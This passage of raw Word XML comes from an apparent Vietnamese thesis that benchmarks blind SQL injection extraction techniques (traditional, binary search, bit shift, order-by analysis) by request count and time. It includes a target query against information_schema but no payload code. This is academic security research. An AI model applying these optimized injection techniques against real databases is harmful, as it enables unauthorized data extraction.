    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Tiếp tục thử nghiệm với module sqlinjection.binary_search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="326E4423" wp14:editId="4B38CF07">
            <wp:extent cx="5972175" cy="645872"/>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972175" cy="645872"/>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7 và thời gian thực hiện xong là 25 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F2A">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.bit_shitf:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6B10FD" wp14:editId="6F77A4C1">
            <wp:extent cx="5972175" cy="64443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972175" cy="644430"/>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7 và thời gian thực hiện xong là 38 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F2A">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.orderby:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF88110" wp14:editId="677C33E1">
            <wp:extent cx="5972175" cy="730417"/>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972175" cy="730417"/>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1 và thời gian thực hiện xong là 14 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0F2A">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Trong bài kiểm tra tiếp theo, thực hiện lấy một chuỗi ký tự với độ dài chưa biết. Các phương pháp sẽ phải thực hiện lấy độ dài chuỗi ký tự đó (bằng thuật toán của mình), rồi tiếp t</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:t>ụ</w:t>
      </w:r>
      <w:bookmarkStart w:id="128" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="128"/>
      <w:r>
        <w:t xml:space="preserve">c lấy ký tự đó. Câu lệnh truy vấn sẽ là: select </w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t xml:space="preserve">DESCRIPTION from </w:t>
      </w:r>
      <w:r w:rsidRPr="0090349F">
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t>CHARACTER_SETS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t>limit 6,1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – lấy giá trị </w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong bảng </w:t>
      </w:r>
      <w:r w:rsidRPr="00141CBB">
        <w:t>CHARACTER_SETS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, database </w:t>
      </w:r>
      <w:r w:rsidRPr="0090349F">
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tại dòng thứ 6. Độ dài của ký tự này là 27.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.blind:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22DF1C40" wp14:editId="644B9119">
            <wp:extent cx="5972175" cy="3124851"/>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972175" cy="3124851"/>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946 và thời gian thực hiện xong là 2152 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F227C7">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.binary_search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="420A61B8" wp14:editId="2353B06E">
            <wp:extent cx="5972175" cy="2958834"/>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972175" cy="2958834"/>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224 và thời gian thực hiện xong là 579 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F227C7">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.bit_shift:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CA4249B" wp14:editId="201D3470">
            <wp:extent cx="5972175" cy="306671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5972175" cy="3066710"/>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196 và thời gian thực hiện xong là 509 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005B29B5">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Thử nghiệm với module sqlinjection.orderby:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B717645" wp14:editId="6AD2F6C7">
            <wp:extent cx="5972175" cy="3420509"/>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5972175" cy="3420509"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Số lần gửi yêu cầu là 28 và thời gian thực hiện xong là 102 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005B29B5">
        <w:t>millisecond</w:t>
      </w:r>
      <w:r w:rsidR="00313D3F">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:t>Tổng kết lại có bảng so sánh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313D3F" w:rsidRDefault="00313D3F" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc459803836"/>
      <w:r>
        <w:t xml:space="preserve">Bảng </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Bảng \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Bảng so sánh tối ưu hóa giữa các phương pháp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="746"/>
        <w:gridCol w:w="2915"/>
        <w:gridCol w:w="1865"/>
        <w:gridCol w:w="1852"/>
        <w:gridCol w:w="1802"/>
      </w:tblGrid>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>STT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Phương pháp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Độ dài chuỗi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Số yêu cầu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRPr="003B7403" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7403">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Thời gian</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Truyền thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>62</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>144</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tìm kiếm nhị phân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Dịch bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Phân tích thứ tự trả về</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Truyền thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>946</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>2152</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tìm kiếm nhị phân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0046249B">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>224</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>579</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Dịch bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0046249B">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>196</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>509</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00571796" w:rsidTr="00313D3F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2915" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Phân tích thứ tự trả về</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1865" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0046249B">
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1802" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="000A795D">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Dựa vào các số liệu, luận văn xây dựng 02 biểu đồ sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
